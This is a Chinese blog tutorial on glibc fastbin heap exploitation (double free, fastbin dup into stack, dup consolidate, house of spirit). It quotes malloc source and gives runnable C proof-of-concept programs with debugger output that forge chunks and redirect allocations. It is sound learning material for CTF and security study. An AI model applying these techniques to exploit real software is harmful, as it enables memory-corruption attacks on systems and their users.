<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>fastbin_attack | chuwei'blog</title><meta name="author" content="chuwei"><meta name="copyright" content="chuwei"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="fastbin_attack介绍 ¶fastbin attack 是一类漏洞的利用方法，是指所有基于 fastbin 机制的漏洞利用方法。这类利用的前提是：  存在堆溢出、use-after-free 等能控制 chunk 内容的漏洞 漏洞发生于 fastbin 类型的 chunk 中  如果细分的话，可以做如下的分类：  Fastbin Double Free House of Spirit A">
<meta property="og:type" content="article">
<meta property="og:title" content="fastbin_attack">
<meta property="og:url" content="http://wysyrg.github.io/2022/08/06/fastbin_attack/index.html">
<meta property="og:site_name" content="chuwei&#39;blog">
<meta property="og:description" content="fastbin_attack介绍 ¶fastbin attack 是一类漏洞的利用方法，是指所有基于 fastbin 机制的漏洞利用方法。这类利用的前提是：  存在堆溢出、use-after-free 等能控制 chunk 内容的漏洞 漏洞发生于 fastbin 类型的 chunk 中  如果细分的话，可以做如下的分类：  Fastbin Double Free House of Spirit A">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://wysyrg.github.io/img/973119.jpg">
<meta property="article:published_time" content="2022-08-06T02:41:45.497Z">
<meta property="article:modified_time" content="2022-01-15T14:44:01.593Z">
<meta property="article:author" content="chuwei">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://wysyrg.github.io/img/973119.jpg"><link rel="shortcut icon" href="/img/1597994478373.jpeg"><link rel="canonical" href="http://wysyrg.github.io/2022/08/06/fastbin_attack/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'fastbin_attack',
  isPost: true,
  isHome: false,
  isHighlightShrink: undefined,
  isToc: true,
  postUpdate: '2022-01-15 22:44:01'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.2.0"><link rel="stylesheet" href="/css/prism-vs.css" type="text/css"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/1597994478373.jpeg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">42</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">7</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">2</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/music/"><i class="fa-fw fas fa-music"></i><span> 音乐</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> 电影</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="not-top-img" id="page-header"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">chuwei'blog</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/music/"><i class="fa-fw fas fa-music"></i><span> 音乐</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> 电影</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav></header><main class="layout" id="content-inner"><div id="post"><div id="post-info"><h1 class="post-title">fastbin_attack</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-08-06T02:41:45.497Z" title="发表于 2022-08-06 10:41:45">2022-08-06</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-01-15T14:44:01.593Z" title="更新于 2022-01-15 22:44:01">2022-01-15</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="fastbin_attack"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div><article class="post-content" id="article-container"><h2 id="fastbin-attack"><a href="#fastbin-attack" class="headerlink" title="fastbin_attack"></a>fastbin_attack</h2><h3 id="介绍-¶"><a href="#介绍-¶" class="headerlink" title="介绍 ¶"></a>介绍 <a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/fastbin-attack/#_1">¶</a></h3><p>fastbin attack 是一类漏洞的利用方法，是指所有基于 fastbin 机制的漏洞利用方法。这类利用的前提是：</p>
<ul>
<li>存在堆溢出、use-after-free 等能控制 chunk 内容的漏洞</li>
<li>漏洞发生于 fastbin 类型的 chunk 中</li>
</ul>
<p>如果细分的话，可以做如下的分类：</p>
<ul>
<li>Fastbin Double Free</li>
<li>House of Spirit</li>
<li>Alloc to Stack</li>
<li>Arbitrary Alloc</li>
</ul>
<p>其中，前两种主要漏洞侧重于利用 <code>free</code> 函数释放<strong>真的 chunk 或伪造的 chunk</strong>，然后再次申请 chunk 进行攻击，后两种侧重于故意修改 <code>fd</code> 指针，直接利用 <code>malloc</code> 申请指定位置 chunk 进行攻击。</p>
<p>由于fastbin采用单链表结构（通过fd指针进行链接，且当 chunk释放时，不会清空next_chunk的prev_inuse，再加上一些检 查机制上的不完善，使得fastbin比较脆弱。针对它的攻击方法包括二次释放、修改fd指针并申请（或释放）任意位置的chunk（或fake chunk）等，条件是存在堆溢出或者其他漏洞可以控制chunk的内容。</p>
<h3 id="fasbin-dup"><a href="#fasbin-dup" class="headerlink" title="fasbin_dup"></a>fasbin_dup</h3><p>fastbin chunk可以很轻松地绕过检查多次释放，当这些chunk 被重新分配出来时，就会导致多个指针指向同一个chunk。 fastbin对二次释放的检查机制仅仅验证了当前块是否与链表头部的块相同，而对链表中其他的块则没有做验证。另外，在释放时还有对当前块的size域与头部块的size域是否相等的检查，由于我们释放的是同一个块，也就不存在该问题，如下所示。</p>
<pre class=" language-lang-c"><code class="language-lang-c">static void _int_free (mstate av, mchunkptr p, int have_lock)
&#123;
  size = chunksize (p);    //获取p的size
  check_inuse_chunk(av, p);//检查p的物理相邻的下一个堆块的inuse位是否置1

  //检查p的大小是否小于global_max_fast
  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
      #if TRIM_FASTBINS
          //检查p物理相邻的堆块是否是top chunk
          && (chunk_at_offset(p, size) != av->top)
      #endif
      ) 
  &#123;
    //检查p的物理相邻下个堆块是否存在,且大小是否满足最小和最大要求
    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
           || __builtin_expect (chunksize (chunk_at_offset (p, size))
                 >= av->system_mem, 0))
        &#123;.......&#125;

    //对chunk的data块通过memset赋值，但是默认情况下是不进行操作    
    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
    //设置 malloc_state的flag
    set_fastchunks(av);

    //获取p对应大小的fastbinY的索引
    unsigned int idx = fastbin_index(size);
    //fb指向对应大小的fastbinY的地址
    fb = &fastbin (av, idx);

    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
    // old为 对应大小的fastbinY的fd值，也就是第一个对块的地址
    mchunkptr old = *fb, old2;
    unsigned int old_idx = ~0u;

    do
      &#123;
           // Check that the top of the bin is not the record we are going to add
         //检查 fastbin中对应的bin的第一项 是否 等于 p (新加入的堆块)
            if (__builtin_expect (old == p, 0))
            &#123;
              errstr = "double free or corruption (fasttop)";
              goto errout;
            &#125;
          //获取 fastbin中对应的bin的第一项的索引。
            if (have_lock && old != NULL)
              old_idx = fastbin_index(chunksize(old));
          //让  p 的fd指向 顶部的fastbin块
            p->fd = old2 = old;
    &#125;
    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
    //catomic_compare_and_exchange_val_rel 功能是 如果*fb等于old2，则将*fb存储为p，返回old2；
    // *fb=p 也就是 让对应fastbin的fd指向 p(新加入的堆块)

    //检查fastbin中对应的bin的第一项的大小是否与p(要添加的块)的大小相同。
    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
      &#123;
            errstr = "invalid fastbin entry (free)";
            goto errout;
      &#125;
  &#125;
&#125;
</code></pre>
<pre class=" language-lang-c"><code class="language-lang-c">#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
&#123;
    fprintf(stderr, "This file demonstrates a simple double-free attack with fastbins.\n");

    fprintf(stderr, "Allocating 3 buffers.\n");
    int *a = malloc(8);
    int *b = malloc(8);
    int *c = malloc(8);

    fprintf(stderr, "1st malloc(8): %p\n", a);
    fprintf(stderr, "2nd malloc(8): %p\n", b);
    fprintf(stderr, "3rd malloc(8): %p\n", c);

    fprintf(stderr, "Freeing the first one...\n");
    free(a);

    fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
    // free(a);

    fprintf(stderr, "So, instead, we'll free %p.\n", b);
    free(b);

    fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
    free(a);

    fprintf(stderr, "Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
    a = malloc(8);
    b = malloc(8);
    c = malloc(8);
    fprintf(stderr, "1st malloc(8): %p\n", a);
    fprintf(stderr, "2nd malloc(8): %p\n", b);
    fprintf(stderr, "3rd malloc(8): %p\n", c);

    assert(a == c);
&#125;
</code></pre>
<pre class=" language-lang-c"><code class="language-lang-c">这个例子演示了一个简单的fastbin的double free
分配3个chunk
第一个 a=malloc(8):0x7cf010
第二个 b=malloc(8):0x7cf030
第三个 c=malloc(8):0x7cf050
free第一个chunk
如果我们再次释放 0x7cf010，程序将崩溃，因为 0x1186010 位于 free 链表的第一个位置上
因此我们先释放 0x7cf030。
现在，我们可以再次释放 0x7cf010，因为它没有位于空闲列表的第一个位置。
现在空闲列表有[0x7cf010, 0x7cf030, 0x7cf010]。如果我们 malloc 3次，我们将得到 0x1186010两次!
第一次 mallc(8): 0x7cf010
第二次 malloc(8): 0x7cf030
第三次 malloc(8): 0x7cf010
</code></pre>
<p>首先分配3个chunk</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201092033023.png" alt="image-20220109161111302"></p>
<p>释放第一个chunk</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201092033025.png" alt="image-20220109161158796"></p>
<p>如果我们再次释放第一个chunk，程序将崩溃，因为 第一个chunk 位于 free 链表的第一个位置上，因此我们先释放第二个chunk</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201092033026.png" alt="image-20220109161226766"></p>
<p>此时，由于 chunk a 处于 bin 中第 2 块的位置，不会被 double-free 的检查机制检查出来，所以我们可以再次释放第一个chunk，chunk a 再次被添加到 fastbins 中：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201092033027.png" alt="image-20220109161737200"></p>
<p>接下来chunk a和chunk b就会形成一个循环链表</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201092033028.png" alt="image-20220109165348072"></p>
<blockquote>
<p>程序展示了 fastbins 的 double-free 攻击，可以泄露出一块已经被分配的内存指针。fastbins 可以看成一个先进后出进的栈，使用单链表来实现，通过 fastbin-&gt;fd 来遍历。由于 free 的过程会对 free list 做检查，我们不能连续两次 free 同一个 chunk，所以这里在两次 free 之间，增加了一次对其他 chunk 的 free 过程，从而绕过了检查顺利执行，然后再 malloc 三次，就在同一个地址 malloc 了两次，也就有了两个指向同一块内存区域的指针</p>
</blockquote>
<h3 id="fastbin-dup-into-stack"><a href="#fastbin-dup-into-stack" class="headerlink" title="fastbin_dup_into_stack"></a>fastbin_dup_into_stack</h3><p>那么如果我们不希望一直循环地调用malloc()函数，应该怎么做呢？答案是修改fd指针。来看程序的后半部分（标记为“fastbin dup into stack”）。假设能够在栈上随意写入（本例中stack_var被赋值 为0x21，作为fake chunk的size），且可以修改chunk的内容，那 么就可以利用二次释放获取chunk，修改其fd指针指向任意伪造的 chunk（任意可写内存，stack、bss、heap等），并在随后的 malloc()调用中将伪造的chunk变成真实的chunk。</p>
<pre class=" language-lang-c"><code class="language-lang-c">#include <stdio.h>
#include <stdlib.h>

int main() &#123;
    /* fastbin double-free */

    int *a = malloc(8);            // malloc 3 buffers
    int *b = malloc(8);
    int *c = malloc(8);
    fprintf(stderr, "malloc a: %p\n", a);
    fprintf(stderr, "malloc b: %p\n", b);
    fprintf(stderr, "malloc c: %p\n", c);

    free(a);                        // free the first one
    free(b);                        // free the other one
    free(a);                        // free the first one again
    fprintf(stderr, "free a => free b => free a\n");

    int *d = malloc(8);            // malloc 3 buffers again
    int *e = malloc(8);
    int *f = malloc(8);
    fprintf(stderr, "malloc d: %p\n", d);
    fprintf(stderr, "malloc e: %p\n", e);
    fprintf(stderr, "malloc f: %p\n", f);

    for(int i=0; i<10; i++)        // loop malloc
    &#123;
        fprintf(stderr, "%p\n", malloc(8));
    &#125;

    /* fastbin dup into stack */

    unsigned int stack_var = 0x21;
    fprintf(stderr, "\nstack_var: %p\n", &stack_var);
    unsigned long long *g = malloc(8);
    *g = (unsigned long long) (((char*)&stack_var) - sizeof(g));    // overwrite fd
    fprintf(stderr, "malloc g: %p\n", g);

    int *h = malloc(8);
    int *i = malloc(8);
    int *j = malloc(8);
    fprintf(stderr, "malloc h: %p\n", h);
    fprintf(stderr, "malloc i: %p\n", i);
    fprintf(stderr, "malloc j: %p\n", j);
&#125;
</code></pre>
<pre class=" language-lang-c"><code class="language-lang-c">pwndbg> x/16gx 0x602000
0x602000:    0x0000000000000000    0x0000000000000021    <-chunk h
0x602010:    0x0000000000602020    0x0000000000000000   
0x602020:    0x0000000000000000    0x0000000000000021    <-chunk_g,chunk_i
0x602030:    0x00007fffffffdd98    0x0000000000000000    <-fd
0x602040:    0x0000000000000000    0x0000000000000021
0x602050:    0x0000000000000000    0x0000000000000000
0x602060:    0x0000000000000000    0x0000000000020fa1
0x602070:    0x0000000000000000    0x0000000000000000
pwndbg> x/4gx 0x00007fffffffdd98
0x7fffffffdd98:    0x00000000004008c1    0x0000000a00000021   <-fake chunk,chunk j
0x7fffffffdda8:    0x0000000000602010    0x0000000000602030
</code></pre>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201092033029.png" alt="image-20220109170759160"></p>
<p>fake chunk的size域需要设置为0x21。当我 们修改了chunk_g的fd，使其指向fake chunk时，就相当于fake chunk作为free chunk被链接进了fastbin，那么在执行malloc()函 数时，就需要接受检查，即该chunk的size大小是否与其所在的 fastbin相匹配，</p>
<pre class=" language-lang-c"><code class="language-lang-c">if ((unsigned long)(nb) <= (unsigned long)(get_max_fast()))
&#123;
    idx = fastbin_index(nb);
    mfastbinptr *fb = &fastbin(av, idx);
#ifdef ATOMIC_FASTBINS
    mchunkptr pp = *fb;
    do
    &#123;
        victim = pp;
        if (victim == NULL)
            break;
    &#125;
    while ((pp = catomic_compare_and_exchange_val_acq(fb, victim->fd, victim)) != victim);
#else
    victim = *fb;
#endif
    if (victim != 0)
    &#123;
        if (__builtin_expect(fastbin_index(chunksize(victim)) != idx, 0))
        &#123;
            errstr = "malloc(): memory corruption (fast)";
        errout:
            malloc_printerr(check_action, errstr, chunk2mem(victim));
            return NULL;
        &#125;
#ifndef ATOMIC_FASTBINS
        *fb = victim->fd;
#endif
        check_remalloced_chunk(av, victim, nb);
        void *p = chunk2mem(victim);
        if (__builtin_expect(perturb_byte, 0))
            alloc_perturb(p, bytes);
        return p;
    &#125;
&#125;
</code></pre>
<h3 id="fastbin-dup-consolidate"><a href="#fastbin-dup-consolidate" class="headerlink" title="fastbin_dup_consolidate"></a>fastbin_dup_consolidate</h3><p>fastbin dup consolidate是另一种绕过fastbin二次释放检查的 方法。我们知道libc在分配large chunk时，如果fastbins不为空，则 调 用 malloc_consolidate() 函 数 合 并 里 面 的 chunk ， 并 放 入 unsorted bin；接下来，unsorted bin中的chunk又被取出放回各 自对应的bins。此时fastbins被清空，再次释放时也就不会触发二次 释放</p>
<pre class=" language-lang-c"><code class="language-lang-c"> if (in_smallbin_range(nb))&#123;   //分配 small bin chunk
     ... ...
 &#125;else&#123;                        //large bin chunk
     idx = largebin_index(nb);
     if (have_fastchunks(av))
        malloc_consolidate(av);

 &#125;

for (;;)
&#123;
    int iters = 0;
    while ((victim = unsorted_chunks(av)->bk) != unsorted_chunks(av))
    &#123;
        //反向遍历 unsorted bin 的双向循环链表，遍历结束的条件是循环链表中只剩下一个头结点
        ... ...
        /* remove from unsorted list */
        unsorted_chunks(av)->bk = bck;
        bck->fd = unsorted_chunks(av);
        //将双向循环链表中的最后一个 chunk 移除。
        ... ...
        /* place chunk in bin */
        if (in_smallbin_range(size)) &#123;
        victim_index = smallbin_index(size);
        bck = bin_at(av, victim_index);
        fwd = bck->fd;
        &#125;else
</code></pre>
<pre class=" language-lang-c"><code class="language-lang-c">#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int main() &#123;
  void* p1 = malloc(0x40);
  void* p2 = malloc(0x40);
  fprintf(stderr, "Allocated two fastbins: p1=%p p2=%p\n", p1, p2);
  fprintf(stderr, "Now free p1!\n");
  free(p1);

  void* p3 = malloc(0x400);
  fprintf(stderr, "Allocated large bin to trigger malloc_consolidate(): p3=%p\n", p3);
  fprintf(stderr, "In malloc_consolidate(), p1 is moved to the unsorted bin.\n");
  free(p1);
  fprintf(stderr, "Trigger the double free vulnerability!\n");
  fprintf(stderr, "We can pass the check in malloc() since p1 is not fast top.\n");
  fprintf(stderr, "Now p1 is in unsorted bin and fast bin. So we'will get it twice: %p %p\n", malloc(0x40), malloc(0x40));
&#125;
</code></pre>
<pre class=" language-lang-c"><code class="language-lang-c">分配了两个fastbins: p1=0x120d010 p2=0x120d060
现在释放p1!
分配大的bin来触发malloc_consolidation(): p3=0x120d0b0
在malloc_consolidated()中，p1被移动到unsorted bin中。
触发double-free漏洞!
我这时候 p1 不在 fastbin 链表的头部了，可以通过malloc的检查
现在 fastbin 和 unsortedbin 中都放着 p1 的指针，所以我们可以 malloc 两次都为 p1:0x120d010 0x120d010
</code></pre>
<p>首先分配2个chunk</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201092033030.png" alt="image-20220109183314074"></p>
<p>释放p1</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201092033032.png" alt="image-20220109183355736"></p>
<p>申请一个大的chunk，触发malloc_consolidation()</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201092033033.png" alt="image-20220109183536326"></p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201092033034.png" alt="image-20220109183600552"></p>
<p>可以看到p1被放到 samll bin中，此时可再次释放p1, malloc 两次都到p1</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202201092033035.png" alt="image-20220109183838379"></p>
<h3 id="house-of-spirit"><a href="#house-of-spirit" class="headerlink" title="house of spirit"></a>house of spirit</h3><h4 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h4><p>House of Spirit算是一个组合型漏洞的利用，是变量覆盖和堆管理机制的组合利用，关键在于能够覆盖一个堆指针变量，使其指向可控的区域，只要构造好数据，释放后系统会错误的将该区域作为堆块放到相应的fast bin里面，最后再分配出来的时候，就有可能改写我们目标区域。假如我们希望对内存中一块fastbins大小的不可控内存区域进行读写，恰巧 满足下面两个条件：一是该区域前后的内存是可控的；二是存在一个可控指针可以作为free()函数的参数，那么通过布局前后内存，伪造 fake chunk并将其释放到fastbins中，就可以在下一次申请同样大小 的内存时取出这块fake chunk，从而获得控制权。</p>
<p>该技术常被用于辅助栈溢出，我们知道栈溢出后通常需要覆盖函 数的返回地址以控制EIP，但有时溢出的长度无法满足这一需求，此 时如果能覆盖一个即将被释放的指针，那么我们就可以让该指针指向 返回地址附近，并在此构造fastbins大小的fake chunk，利用house of spirit将fake chunk变成真chunk，从而获得返回地址的控制权。</p>
<h4 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h4><ul>
<li><p>伪造堆块</p>
</li>
<li><p>覆盖堆指针指向上一步伪造的堆块。</p>
</li>
<li><p>释放堆块，将伪造的堆块释放入fastbin的单链表里面。</p>
</li>
<li><p>申请堆块，将刚刚释放的堆块申请出来，最终使得可以往目标区域中写入数据，实现目的</p>
</li>
<li></li>
</ul>
<h4 id="检查"><a href="#检查" class="headerlink" title="检查"></a>检查</h4><p>伪 造 fake chunk 需 要 绕 过 一 些 检 查 ， 首 先 是 标 志 位 ， PREV_INUSE 并 不 影 响 释 放 的 过 程 ， 但 IS_MMAPPED 和 NON_MAIN_ARENA 都 要 为 零 。 其 次 ， 在 64 位 系 统 中 fastbin chunk 的大小要在32~128 字节之间，需要对齐。最后，next chunk的大小必须大于2*SIZE_SZ（即大于0x10），小于av- &gt;system_mem（即小于0x21000），才能绕过libc对next chunk 大小的检查。</p>
<p>首先mmap标志位不能被置上，否则会直接调用munmap_chunk函数去释放堆块。</p>
<pre class=" language-lang-c"><code class="language-lang-c">/* find the heap and corresponding arena for a given ptr */
#define heap_for_ptr(ptr) \
    ((heap_info *)((unsigned long)(ptr) & ~(HEAP_MAX_SIZE - 1)))
#define arena_for_chunk(ptr) \
    (chunk_non_main_arena(ptr) ? heap_for_ptr(ptr)->ar_ptr : &main_arena)
 void public_fREe(Void_t* mem)&#123;
    mstate ar_ptr;
    mchunkptr p;                          /* chunk corresponding to mem */

    ... ...

    p = mem2chunk(mem);

 #if HAVE_MMAP
   if (chunk_is_mmapped(p))                       /*首先M标志位不能被置上才能绕过。release mmapped memory. */
   &#123;
     munmap_chunk(p);
     return;
   &#125;
 #endif

   ar_ptr = arena_for_chunk(p);

   ... ...

   _int_free(ar_ptr, mem);
</code></pre>
<p>其次是伪造堆块的size字段不能超过fastbin的最大值，超过的话，就不会释放到fastbin里面了。</p>
<p>最后是下一个堆块的大小，要大于2*SIZE_ZE小于system_mem,否则会报invalid next size的错误。</p>
<pre class=" language-lang-c"><code class="language-lang-c">void _int_free(mstate av, Void_t* mem)
  &#123;
    mchunkptr       p;           /* chunk corresponding to mem */
    INTERNAL_SIZE_T size;        /* its size */
    mfastbinptr*    fb;          /* associated fastbin */

    ... ...

   p = mem2chunk(mem);
   size = chunksize(p);

   ... ...

   /*
     If eligible, place chunk on a fastbin so it can be found
     and used quickly in malloc.
   */

   if ((unsigned long)(size) <= (unsigned long)(av->max_fast)   /*其次，size的大小不能超过fastbin的最大值*/

 #if TRIM_FASTBINS
       /*
        If TRIM_FASTBINS set, don't place chunks
        bordering top into fastbins
       */
       && (chunk_at_offset(p, size) != av->top)
 #endif
       ) &#123;

     if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
        || __builtin_expect (chunksize (chunk_at_offset (p, size))
                          >= av->system_mem, 0))                        /*最后是下一个堆块的大小，要大于2*SIZE_ZE小于system_mem*/
       &#123;
        errstr = "free(): invalid next size (fast)";
        goto errout;
       &#125;

     ... ...
     fb = &(av->fastbins[fastbin_index(size)]);
     ... ...
     p->fd = *fb;
   &#125;
</code></pre>
<h4 id="示例"><a href="#示例" class="headerlink" title="示例"></a>示例</h4><pre class=" language-lang-c"><code class="language-lang-c">#include <stdio.h>
#include <stdlib.h>

int main()
&#123;
    fprintf(stderr, "This file demonstrates the house of spirit attack.\n");

    fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
    malloc(1);

    fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
    unsigned long long *a;
    // This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
    unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

    fprintf(stderr, "This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[9]);

    fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
    fake_chunks[1] = 0x40; // this is the size

        // fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8
    fake_chunks[9] = 0x1234; // nextsize

    fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
    fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
    a = &fake_chunks[2];

    fprintf(stderr, "Freeing the overwritten pointer.\n");
    free(a);

    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
    fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
&#125;
</code></pre>
